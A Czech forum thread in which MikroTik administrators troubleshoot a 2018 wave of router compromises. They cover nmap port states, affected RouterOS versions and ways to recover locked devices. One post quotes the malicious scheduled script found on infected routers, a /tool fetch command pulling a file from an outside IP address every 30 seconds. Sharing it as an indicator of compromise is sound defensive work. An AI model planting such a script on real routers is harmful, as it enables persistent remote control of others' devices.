MikroTik - BEZPECNOSTNI UPOZORNENI !!! DULEZITE - zablokovane MikroTiky

[mpcz]

Na některé stroje jdu přímo a přesto ten port 8266 vidím (polo)aktivní. mpcz, 15.7.2018

[mpcz]

PORT STATE SERVICE
8266/tcp filtered unknown
A co si vlastně mám pod tímto sdělením NMAPu představit konkrétně? Dík, mpcz, 15.7.2018

[helapc]

Port je aktivní, ale blokováný firewallem

[iTomB]

tak si zkuste jakykoliv nahodny port a dostanete stejnou odpoved. Co znamena polofunkcni fakt nevim. Pripadne si dej pred ten router LOGovani provozu na danem portu.

Ja bych to zavrel jako plany poplach a nepochopeni hlasky z nmapu.

[mpcz]

No to je samozřejmě taky možné, ale pamatuj také na toho operátora radaru, co viděl hejno hus a bylo to 353 bombardérů. Takže bych tomu planému poplachu rád přišel na kloub. Proč? Protože když oscanuji IP na všechny porty, dostanu:

Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-15 18:07 Stoední Evropa (letní eas)
Nmap scan report for xxx.xxx.xxx.xx
Host is up (0.0061s latency).
Not shown: 65525 closed ports
PORT STATE SERVICE
53/tcp open domain
1222/tcp filtered nerv
1723/tcp open pptp
2000/tcp open cisco-sccp
8080/tcp filtered http-proxy
8266/tcp filtered unknown
30115/tcp filtered unknown
Když oscanuji jen konkrétní port 8266, dostanu to výše, 8265 - closed, 8267 - closed.
mpcz, 15.7.2018

[Myghael]

Rozdíl je opravdu prostý - v jednom případě se ten packet na firewallu, ať už na zařízení nebo po cestě, prostě zahodí (odfiltruje), v druhém dojde až na zařízení, které spojení aktivně odmítne (protože je zavřeno).

[mpcz]

No to je možné, ale:
1/ dá se z toho vyvodit, že někdo/něco operuje aktivně s tímto portem?
2/ protože si nejsem vědom změn v konfiguraci z mé strany, jak přijít na to, co to způsobuje? Podotýkám, že tento port není nikde v internetu evidován jako používaný standard, vyjma textové podobnosti názvu s modulem ESP8266 pro wifi. Dík, mpcz, 15.7.2018

[hapi]

nemáš tam náhodou action=reject?

[mpcz]

Nemám. mpcz, 15.7.2018

[3com]

Neví někdo na jaký Login a Heslo to ta havět mění?

[mpcz]

Už jsi to odepl od napájení? Změnila se verze ROS? mpcz, 23.7.2018

[CrazyApe]

Je už nějaká bezpečná verze prosim? Zatím jsme bez napadeni tuk tuk tuk ale nechce se mi to vše upgradovat 10x

[3com]

U nás byl klid všechny MK při začátku této kauzy updatovány na 6.41.3/6.42.2. A nikde nic napadeno nebylo do včerejšího dne... Včera během jednoho dne se to zničeho nic dostalo do několika stovek MK.

- infikované jsou pouze stroje s veřejnou IP a nevyplněnou položkou našich IP rozsahů v IP-Services (Winbox s default portem 8291). Pokud je port jiný tam se to nikde nedostalo. Všechny ostatní položky v IP-services jsme měly vždy Disable (SSH,Telnet,WWW atd).. Takže to tam muselo přijit jedině přes Winbox/Dude (dle logu).
- a jsou dva případy infekce:
1. Ten lepší co jde vyřešit na dálku:
- Ve Files je soubor Mikrotik.php (nic nezabírá je úplně prázdný ani políčko textu), dle všeho jen pro otestování viru jestli se tam podaří nahrát soubor.
- V Script list je polozka script1_ v kterém je řádek: /tool fetch address=95.154.216.160 port=2008 src-path=/mikrotik.php mode=http
- V Scheduleru je položka schedule1_ ,která každých 30sekund spouští script viz. výše.

vir.png (222.91 KiB) Zobrazeno 2507 x

Všechny tyto RB jsou bez restartu s uptimem desítky dní, nic jiného se tam nezměnilo, stačí to ručně smazat a vyplnit IP-Services + upgrade na 6.42.5 a je vyřešeno.

2. Ten horší případ:
Změněný Login a Heslo. Na dálku netuším jak vyřešit.... RB funguje jak má i s uptimem desítek dní, ale hotovo... bez získání hesla asi nezbyde nic jiného než Netinstall na místě nebo Fyzický reset a pak update FW a nová konfigurace... Port to nijak nezměnilo, protože piše špatný login i přes MacTelnet.

[mpcz]

Co to je prosím dle logu? Podle Sergeje je chyba ve www a winboxu opravena již dříve, než ty tvoje verze. Při těch stovkách strojů nebyla ani jedna 6.42.5? Nezískal někde někdo heslo, které bylo společné? A pak třeba vlezl po MAC do těch strojů s bezpečnou verzí? V logu není zalogováný žádný login? Bylo určtě blokováno WWW na všech portech?
Pokud máš zablokované stroje heslem, neklesej na mysli, není to takový problém, jak to z počátku vypadá. Kolik jich asi tak je? Pokud samozřejmě vir nezmutoval. mpcz, 23.7.2018

[hapi]

[quote="3com"][/quote]

pokud to resetneš tlačítkem tak by se měl vytvořit backup na disku a ten pak jenom obnovit ale nejsem si jistej. Napadlo to i ty 6.42.x nebo ne? nějak to není z postu zřejmý. Otázkou je, jestli si z 6.41 nevzali hesla a nepoužili je do nových verzí kde sice heslo nevytahnou ale použijou ho pro uploadování kodu za pomocí hesla což už bych věřil že půjde.